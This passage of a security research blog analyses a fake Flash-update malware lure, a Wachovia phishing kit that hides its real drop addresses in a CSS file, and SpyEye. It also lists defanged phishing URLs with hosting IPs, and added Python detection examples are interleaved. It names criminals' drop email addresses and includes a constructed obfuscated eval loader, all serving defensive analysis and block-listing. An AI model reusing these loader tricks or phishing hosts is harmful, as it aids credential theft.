In this case, when the user accesses the fake page, instead of the video presentation playing automatically a supposed Flash plugin error is shown, offering to download a binary called flash-plugin_update.45125 (MD5: 45E21E0CDA8D456B26D1808D4ACB76B0), which is malware with a very low detection rate.


The website is hosted at a German ISP, on IP address 188.40.84.202. The executable, however, is downloaded from electricmediadata.com (67.15.47.189), hosted at ThePlanet under ASN21844, which has been identified as hosting:
  • Botnet C&C servers
  • Phishing servers
  • Spam servers
  • Malware servers
Although this scenario is not surprising nowadays, since it is well known that the propagation/infection process always carries an important element of deception, the infection rate achieved during the initial stage, when social engineering is used as the propagation vector, remains very high.

This raises two far from trivial points. First, social engineering techniques are a key ingredient of propagation processes and do not go out of fashion; second, given this, and especially given their high effectiveness, it seems that the culture of prevention is very poor, or is it that... awareness processes are simply not enough?
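Two domain tricks run through this page: the ZeuS Google/Blogger and Facebook/VISA campaigns write the brand's whole domain into a subdomain of a throwaway .kr registration (www.google.com.zobv.kr, reports.cforms.visa.com.desz.or.kr), the phishing databases show the same brand string buried in a path (.../www.hsbc.co.uk/...), and this post shows a one-letter typosquat (vaucouver2010.com). The following is an added example, not code from this site, that classifies a URL against a list of protected brands by first reducing the host to its registrable domain and only then looking for the brand in the leftover labels, the path, or as a near-miss spelling. PUBLIC_SUFFIXES is a deliberately tiny hand-written stand-in for the Public Suffix List and PROTECTED is an assumed brand list; both are assumptions for the example.

```python
"""Classify phishing URLs against a list of protected brand domains.

Added example for this page, not the site's own tooling. PUBLIC_SUFFIXES is a
tiny hand-written stand-in for the Public Suffix List and PROTECTED an assumed
brand list (both assumptions); use the real list in production.
"""
from __future__ import annotations
from urllib.parse import urlsplit

# Assumption: only the suffixes needed for this page plus a few common ones.
PUBLIC_SUFFIXES = {
    "com", "net", "org", "info", "tk", "it", "de", "fr", "kr",
    "co.kr", "or.kr", "ne.kr", "co.uk", "com.au", "co.nz", "com.es",
}

# Brands we want to protect (registrable domains).
PROTECTED = {
    "google.com", "blogger.com", "facebook.com", "visa.com",
    "hsbc.co.uk", "paypal.com", "vancouver2010.com",
}


def registrable_domain(host: str) -> str:
    """eTLD+1 of a hostname: longest known public suffix plus one label."""
    labels = host.lower().rstrip(".").split(".")
    for i in range(1, len(labels)):
        if ".".join(labels[i:]) in PUBLIC_SUFFIXES:
            return ".".join(labels[i - 1:])
    return ".".join(labels)


def levenshtein(a: str, b: str) -> int:
    """Edit distance, used to catch one- or two-character typosquats."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def classify(url: str) -> tuple[str, str | None]:
    """Return (verdict, brand): legit, embedded-brand, typosquat or unknown."""
    parts = urlsplit(url if "://" in url else "http://" + url)
    host = (parts.hostname or "").lower()
    reg = registrable_domain(host)
    if reg in PROTECTED:
        return "legit", reg
    # The brand's domain appears somewhere it does not control: a subdomain
    # label or the path. Only the registrable domain says who owns a host.
    haystack = host + parts.path.lower()
    for brand in sorted(PROTECTED):
        if brand in haystack:
            return "embedded-brand", brand
    # Near-miss spelling of the second-level label. Short labels are skipped:
    # one edit on a four-letter name is not evidence of anything.
    reg_label = reg.split(".")[0]
    best: tuple[int, str] | None = None
    for brand in sorted(PROTECTED):
        brand_label = brand.split(".")[0]
        if len(brand_label) < 6 or brand_label == reg_label:
            continue
        d = levenshtein(reg_label, brand_label)
        if d <= 2 and (best is None or d < best[0]):
            best = (d, brand)
    if best is not None:
        return "typosquat", best[1]
    return "unknown", None


if __name__ == "__main__":
    for u in ("http://www.google.com.zobv.kr/update/VE.php",
              "http://vaucouver2010.com", "http://www.vancouver2010.com"):
        print(u, "->", classify(u))
```

The order of the checks matters: the registrable domain is compared first so that a genuine www.google.com is never mistaken for an "embedded brand", and the substring search is run only on what is left once ownership has been settled.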

Related Information
Visual social engineering to spread malware
Deception techniques that do not go out of style
Visual social engineering and the use of pornography as a propagation and infection vector II
Visual social engineering and the use of pornography as a propagation and infection vector

Jorge Mieres


12.2.10

Dissection of a fraudulent package. Wachovia phishing attack

In one of our most recent posts we published a series of links to phishing pages targeting various entities. Today we analyze one of them, an attack aimed at Wachovia bank customers.

To that end we obtained the full kit and began analyzing the files it contains. Basically there are a few PHP and HTML files, various images and three style sheets.

If we look at one of the PHP files, BiMaR.php, we see the following:

So far nothing unusual: the typical data collection form is shown and the data is sent to a couple of email addresses.

But if we look closely, line 4 is somewhat peculiar. The variable $messege is misspelled and is not used in the rest of the script, which uses the variable $message instead. Moreover, its value is a base64 encoded string. Decoding it gives this:

$send = "dopret2001@gmail.com.dopret2001@yahoo.com";

A couple of e-mail addresses... odd.

We analyze another of the files, details.php, and find another striking piece of code:

Decoding the string gives two email addresses:

anpyth@aol.com,e.b1952@menara.ma

In this scenario our first thought is that we may be looking at a backdoor through which the creator of the phishing pack steals the data from his own customers. To make matters worse, both pieces of code in that file are somewhat strange: the first is not very well formed and the second, with the eval function, is very suspect.

To dig deeper, we install the package on a web server and browse the fraudulent site, filling in the fields to see how the pack behaves.

Once we reach the last step and confirm the data, the page sends the private information via SMTP as expected, with one exception: the destination addresses are none of those we located in the PHP files.

We quickly search for the addresses across the entire directory, including the images, with no results. Obviously all these addresses have to come from somewhere, but... where?

Listing the directory that houses the images and style sheets, we can see that one of the CSS files is much larger than the others, so we open it. Everything looks normal until, past the middle of the file, there is an unreadable block, even showing up as Chinese characters, which obviously has all the hallmarks of being the cause of the unexpected behavior.

We roll up our sleeves and go through the PHP files again to trace it, and finally get results. The file AuthService.php has several somewhat cryptic functions that call each other, forming a chain.

So we put a couple of echo statements in strategic places and, presto, our friend appears before our eyes:

Code similar to that in BiMaR.php but with six different email addresses, which is where the stolen information is actually sent:
  • usa813@inbox.com
  • usa813@easy.com
  • usa813@hotmail.fr
  • zoka_1845497@usa814.freezoka.com
  • usa813@excite.co.uk
  • usa813@gmx.com
We are thus facing a diversion by the phishers, who like conjurers put before our eyes what they want us to believe, while the actual operation goes beyond superficial appearances.
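The steps above (decode the odd base64 string, distrust the eval, notice the oversized CSS and look inside it) can be turned into a first-pass triage that runs over every file in a kit regardless of extension. The following is an added example, not the kit's code and not this site's tooling: build_sample_kit() writes a constructed kit to a temporary directory that mimics the three tricks described, using example.com and example.net placeholder addresses rather than the real ones, and scan_kit() reports plain and base64-hidden addresses, eval() calls, and files several times larger than their siblings. The real kit's CSS blob was not base64; base64 is used here as the stand-in encoding, which is an assumption.

```python
"""Triage a phishing kit for hidden drop addresses and obfuscated loaders.

Added example for this page, not the kit's code. build_sample_kit() writes a
constructed kit (example.com/.net placeholder addresses) that mimics the three
tricks the post describes: a base64 string in an unused variable, an eval()
on a decoded string, and an opaque blob buried in an oversized CSS file. The
real kit's CSS blob was not base64; that encoding is an assumption here.
"""
from __future__ import annotations
import base64
import binascii
import os
import re
import statistics
import tempfile

B64_RUN = re.compile(rb"[A-Za-z0-9+/]{40,}={0,2}")
EMAIL = re.compile(rb"[\w.+-]+@[\w-]+(?:\.[\w-]+)+")
EVAL = re.compile(rb"\beval\s*\(")


def _decoded_blobs(data: bytes):
    """Yield the decoded form of every base64-looking run in a file."""
    for match in B64_RUN.finditer(data):
        try:
            yield base64.b64decode(match.group(0), validate=True)
        except (binascii.Error, ValueError):
            continue


def scan_kit(root: str) -> list[tuple[str, str, str]]:
    """Return sorted (relative_path, finding, detail) triples for the kit.

    Every file is inspected whatever its extension: in the post the real drop
    addresses lived in a style sheet, not in the PHP.
    """
    findings: list[tuple[str, str, str]] = []
    sizes: dict[str, list[tuple[str, int]]] = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root)
            with open(path, "rb") as fh:
                data = fh.read()
            sizes.setdefault(os.path.splitext(name)[1].lower(), []).append((rel, len(data)))
            for addr in sorted(set(EMAIL.findall(data))):
                findings.append((rel, "plain-email", addr.decode()))
            for blob in _decoded_blobs(data):
                for addr in sorted(set(EMAIL.findall(blob))):
                    findings.append((rel, "base64-email", addr.decode()))
            if EVAL.search(data):
                findings.append((rel, "eval", ""))
    # A file several times larger than its siblings of the same type.
    for entries in sizes.values():
        if len(entries) < 2:
            continue
        median = statistics.median(size for _, size in entries)
        for rel, size in entries:
            if size > 4 * median:
                findings.append((rel, "size-outlier", f"{size} bytes vs median {median:.0f}"))
    return sorted(findings)


def drop_addresses(findings: list[tuple[str, str, str]]) -> set[str]:
    """Every address found, visible or decoded."""
    return {detail for _, kind, detail in findings if kind.endswith("email")}


def build_sample_kit() -> str:
    """Write the constructed kit to a temp directory and return its path."""
    root = tempfile.mkdtemp(prefix="kit-")

    def put(name: str, content: bytes) -> None:
        with open(os.path.join(root, name), "wb") as fh:
            fh.write(content)

    # Misspelled, unused variable holding base64 (the BiMaR.php trick).
    decoy = base64.b64encode(b'$send = "decoy1@example.com,decoy2@example.com";')
    put("BiMaR.php", b"<?php\n$message = $_POST['data'];\n$messege = '" + decoy
        + b"';\nmail('visible@example.com', 'log', $message);\n")
    # eval() over a decoded string (the details.php trick).
    loader = base64.b64encode(b'$to = "decoy3@example.com"; mail($to, "x", $message);')
    put("details.php", b"<?php\neval(base64_decode('" + loader + b"'));\n")
    # Two ordinary style sheets and one padded out with a hidden blob.
    put("base.css", b"a{color:#000}\n" * 8)
    put("common.css", b"a{color:#000}\n" * 8)
    hidden = base64.b64encode(b'$send = "drop1@example.net,drop2@example.net";')
    put("theme.css", b"body{margin:0}\n" * 40 + b"/*" + hidden + b"*/\n")
    return root


if __name__ == "__main__":
    kit = build_sample_kit()
    for finding in scan_kit(kit):
        print(*finding)
    print("addresses:", sorted(drop_addresses(scan_kit(kit))))
```

A scanner like this does not replace the dynamic check the post relied on (running the kit and watching what it actually sends), but it pulls the decoys and the hidden blob into one list so that the addresses observed on the wire can be matched against it.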

An important fact that emerges from analysing the server is that the same pages also impersonate two other banks, Lloyds TSB and Bank of America, both with the same defence mechanism in the CSS.


As we see, the mechanisms used in phishing attacks are also perfected every day, not only in their attack strategies but also in their defence mechanisms, which in this case amount to an interesting diversion.

Related information
Phishing database I
Phishing Kit In-the-Wild for cloning website, version 2
Phishing Kit In-the-Wild for cloning website
Phishing y "cuentos" en navidad
Phishing para American Express y consejos

Ernesto Martin
Crimeware Researcher in Malware Intelligence

10.2.10

SpyEye Bot. Analysis of a new alternative scenario crimeware

Earlier this year, a new application designed to feed the criminal and fraudulent business saw the light in the underground black market that drives crimeware.

This application, called SpyEye, is aimed at facilitating the recruitment of zombies and managing the resulting network (C&C - Command and Control) through a web-based management panel, from which it is possible to process the information obtained (intelligence) and store it as statistics, a common activity of today's criminal packages.

Judging by its characteristics, very similar to those of its counterpart ZeuS, SpyEye presents itself as a potential successor to it within the crimeware scenario. Furthermore, it is evident that criminal activities now represent a large business in which cyber criminals and would-be cyber criminals abuse their "kindness".

This document describes the activities of SpyEye from the infection stage onward, giving relevant information about its purpose.

The full document can be downloaded from:

Spanish version
English version

Related information
Compendio Anual de Información. El crimeware durante el 2009
SpyEye Bot. New bot on the market

Jorge Mieres

8.2.10

Phishing database I

Phishing is a purely criminal activity, part of the circuit that drives the illegal business of crimeware, designed to steal money using the sensitive and private information that criminals obtain from users through illicit activities.

Therefore, as a preventive measure, it is important to block access to the domains that usually host cloned pages of banks, webmail and any other Internet service that requires authentication.

To that end, Phishing database was born: a compendium of fraudulent domains for counteracting phishing, which can be used to create block lists.

Wachovia Corporation
http://www.stc.lk/it/home/online.wachovia.com/accountupdate/AuthService.php?action=presentLogin&url=https%3a//onlineservices.wachovia.com/NASApp/NavApp/Titanium%3faction%3dreturnHome (96.30.15.196) - United States

PayPal
h**p://aurelie-et-arnaud.me/img/paypal/verify/login.php (213.186.33.87) - France
h**p://www.yvescochet.net/.secure.paypal.fr/verified_by_paypal/webscrcmd=_login-run/cgi-bin/_login/ (213.186.33.2) - France
h**p://dz-tero.com/paypal/ (74.217.128.53) - Canada
h**p://www.paypal.com.0ytyz0oxg18bu.124nruo3kb3j903ers01.com/cgi-bin/webscr/?login-dispatch&login_email=unnimay@aol.com&ref=pp&login-processing=ok (195.56.18.126) - Hungary
h**p://www.124nruo3kb3j903ers01.com/cgi-bin/webscr/ (195.56.18.126) - Hungary
h**p://www.syrianaction.com/data/.confirm/paypal/ (88.198.217.51) - Germany
h**p://www.paypalcomservupdate.intl-paypal1.com/us/cgi-bin/?cmd=_login-run (218.36.124.140) - Korea, Republic Of
h**p://ukghd.com/images/www.paypal.com/cgi-bin/webscr.htm?cmd=_login-run (85.192.32.211) - Russian Federation
h**p://203.101.73.204/www.paypal.com.au/security/cgi-bin/webscr.htm?cmd=_login-run - India
h**p://52274548.es.strato-hosting.eu/lol/webscr.php?cmd=LogIn (81.169.145.81) - Germany
h**p://www.kules.knows.nl/cgi/ (91.121.2.117) - France
h**p://lejournalduthesard.info/help/css/update/online-information/fr/verefication-compte/online-update/webscr.php?cmd=_login-run&dispatch=5885d80a13c0db1f1ff80d546411d7f84f1036d8f209d3d19ebb6f4eeec8bd0e57b2ad7d754c297ea32a3580bcf6dcb357b2ad7d754c297ea32a3580bcf6dcb3
h**p://208.101.19.98/~mikorg/ - United States
h**p://iwww.cz.cc/PayPal.fr/paypal/fr/webscr.php?cmd=_login-run&dispatch=5885d80a13c0db1f998ca054efbdf2c29878a435fe324eec2511727fbf3e9efc0779736997661668caf8ff5d99e81fe40779736997661668caf8ff5d99e81fe4

egg
h**p://www.luxor2020.com/about/files/Image/jpg/txt/neweggcom/security/customer/index.html (207.210.125.219) - United States

CUA
h**p://www.zoi-creation.com/customers.cua.com.au/webbanker/CUA/2/notice.htm
h**p://www.zoi-creation.com/customers.cua.com.au/webbanker/CUA/ (93.184.35.226) - France

HSBC
h**p://cmodz-hosting.com/upload/cache/IBlogin.html (66.102.237.82) - United States
h**p://www.w650-france.com//forum/modules/index.html (213.186.33.4) - France
h**p://www.ifsb.co.kr/bbs/data/guest/gold/folder/folder/New%20Folder/United2/Folder/Folder/Folder/Folder/Folder/Folder/Folder/empty/empty/empty/United2/United/United/United/HSBC/index.html (210.102.34.17) - Korea, Republic Of
h**p://dodongminhhien.com/modules/pib-home/2/1/personal/hsbc.co.uk/IBlogin.html (203.113.173.20) - Viet Nam

eBay
h**p://rahasiabisnis21.com/_space/apache_module.php (202.69.111.58) - Indonesia
h**p://www.ebay.motors-cgi-items.com/cars-trucks_2003-BMW330I_W0QQitemZ15982632345413QQihZ012QQcategory-cars-trucksZ21983317QQssPageNameZWDVWQQrdZ1QQcmdZViewItems/index2.php (69.147.83.187) - United States
h**p://190-13-160-211.bk14-ipfija.surnet.cl/.ws-cgi/index.php - Chile
h**p://7beginnings.com/~sothebys/assets/profile/ws/login.html (203.211.129.222) - Singapore

JPMorgan Chase Bank
h**p://7beginnings.com/~sothebys/assets/profile/auth/secure/chase-sec/onlinebanking.chase.com=logon_confirm/ (203.211.129.222) - Singapore

In this case, the same hosting space holds one phishing page against eBay and another against JPMorgan Chase Bank, at IP address 203.211.129.222. The site is controlled by a PHP shell called !islamicshell v. edition ADVANCED!.

The truth is that, in addition to uploading cloned web pages, the attacker can quietly do such things as spread malware of any type hosted on the same server that hosts the site, including defacement (very common, and what PHP shells tend to be used for).

Lloyds TSB Bank
h**p://www.ifsb.co.kr/bbs/data/guest/gold/folder/folder/New%20Folder/United2/Folder/Folder/Folder/Folder/Folder/Folder/Folder/empty/empty/empty/United2/United/United/United/Lloyds/customer.php (210.102.34.17) - Korea, Republic Of

Barclays
h**p://www.ifsb.co.kr/bbs/data/guest/gold/folder/folder/New%20Folder/United2/Folder/Folder/Folder/Folder/Folder/Folder/Folder/empty/empty/empty/United2/United/United/United/Barclays/LoginMember.login.htm (210.102.34.17) - Korea, Republic Of

Canada Revenue Agency
h**p://221.134.144.147/cra-arc.gc.ca/esrvc-srvce/tx/ndvdls/myrefund/getStatus_en.htm

Poste italiane
h**p://fgewfgewdfsa.pochta.ru/posste.html (82.204.219.221) - RU
h**p://mesagio-postepay.xaker.ru/postpayleg-clientesdasdhit.html (194.67.36.117) - RU

Abbey
h**p://www.velositas.com/update/myonlineacounts2.abbeynational.co.uk/Logonaction=prepared/Logonaction=prepare/ (75.126.202.209) - US
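The list above is published in a defanged form (h**p://, the hosting IP in parentheses, the country after a dash) grouped under the impersonated brand, and the post notes that one host can serve kits for several brands at once. The following is an added example, not code from the post: it parses entries in that format into a host list and an IP list suitable for a block list, flags URLs that carry a brand's real domain in a subdomain or path rather than as the registered host, and groups entries by host to show which hosts serve more than one brand. The entries it runs over are constructed with reserved example domains and documentation IP ranges, not taken from the list.

```python
import ipaddress
import re
from urllib.parse import urlsplit

# Constructed sample in the format of the list above: brand headings, defanged
# URLs, optional "(ip)" and optional "- country". Hosts and IPs are placeholders.
SAMPLE_ENTRIES = """PayPal
h**p://www.paypal.com.login-check.example/cgi-bin/webscr/?cmd=_login-run (192.0.2.10) - Hungary
h**p://192.0.2.44/www.paypal.com.au/security/cgi-bin/webscr.htm?cmd=_login-run - India
h**p://photos.example.net/images/www.paypal.com/cgi-bin/webscr.htm (198.51.100.7) - Russian Federation

HSBC
h**p://forum.example.org//modules/index.html (203.0.113.9) - France
h**p://photos.example.net/hsbc.co.uk/IBlogin.html (198.51.100.7) - Russian Federation
"""

ENTRY_RE = re.compile(
    r"^(h\*\*p|https?)://(\S+)"                   # scheme (defanged or not) and URL
    r"(?:\s+\((\d{1,3}(?:\.\d{1,3}){3})\))?"       # optional "(ip)"
    r"(?:\s+-\s+(.+))?$"                           # optional "- country"
)

# Legitimate domains of each brand; an assumption for the example, extend as needed.
BRAND_DOMAINS = {"paypal": ["paypal.com", "paypal.com.au"], "hsbc": ["hsbc.co.uk", "hsbc.com"]}


def refang(url):
    """Turn the published h**p:// form back into a parseable scheme."""
    return re.sub(r"^h\*\*p(s?)://", r"http\1://", url)


def parse_entries(text):
    """Lines without a URL are brand headings; every URL line becomes a dict."""
    entries, brand = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = ENTRY_RE.match(line)
        if not m:
            brand = line
            continue
        url = refang(m.group(1) + "://" + m.group(2))
        entries.append({"brand": brand, "url": url, "host": urlsplit(url).hostname.lower(),
                        "ip": m.group(3), "country": m.group(4)})
    return entries


def host_blocklist(entries):
    """Sorted unique hostnames and IPs; literal-IP hosts go to the IP list."""
    hosts, ips = set(), set()
    for e in entries:
        try:
            ips.add(str(ipaddress.ip_address(e["host"])))
        except ValueError:
            hosts.add(e["host"])
        if e["ip"]:
            ips.add(e["ip"])
    return sorted(hosts), sorted(ips)


def is_blocked(url, hosts, ips):
    """Match a URL's host against the list, including subdomains of listed hosts."""
    host = (urlsplit(refang(url)).hostname or "").lower()
    return host in ips or any(host == h or host.endswith("." + h) for h in hosts)


def brand_lookalikes(entries, brand_domains=BRAND_DOMAINS):
    """(host, brand_domain) where the brand's domain appears in the URL but is not the real host."""
    flagged = []
    for e in entries:
        for domains in brand_domains.values():
            for d in domains:
                if d in e["url"].lower() and not (e["host"] == d or e["host"].endswith("." + d)):
                    flagged.append((e["host"], d))
                    break
    return flagged


def shared_hosts(entries):
    """Hosts serving pages for more than one brand, as the post observed for 203.211.129.222."""
    by_host = {}
    for e in entries:
        by_host.setdefault(e["host"], set()).add(e["brand"])
    return {h: sorted(b) for h, b in by_host.items() if len(b) > 1}


if __name__ == "__main__":
    parsed = parse_entries(SAMPLE_ENTRIES)
    hosts, ips = host_blocklist(parsed)
    print("hosts:", hosts)
    print("ips:", ips)
    print("lookalikes:", brand_lookalikes(parsed))
    print("shared:", shared_hosts(parsed))
```

Hostnames, not full URLs, are what a DNS or proxy block list should carry, since the paths in such kits change from upload to upload while the compromised host stays the same; the IP list is kept separately because some entries are hosted on bare addresses and because shared hosting can put unrelated sites behind the same IP, so it should be applied with more care than the host list.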

Jorge Mieres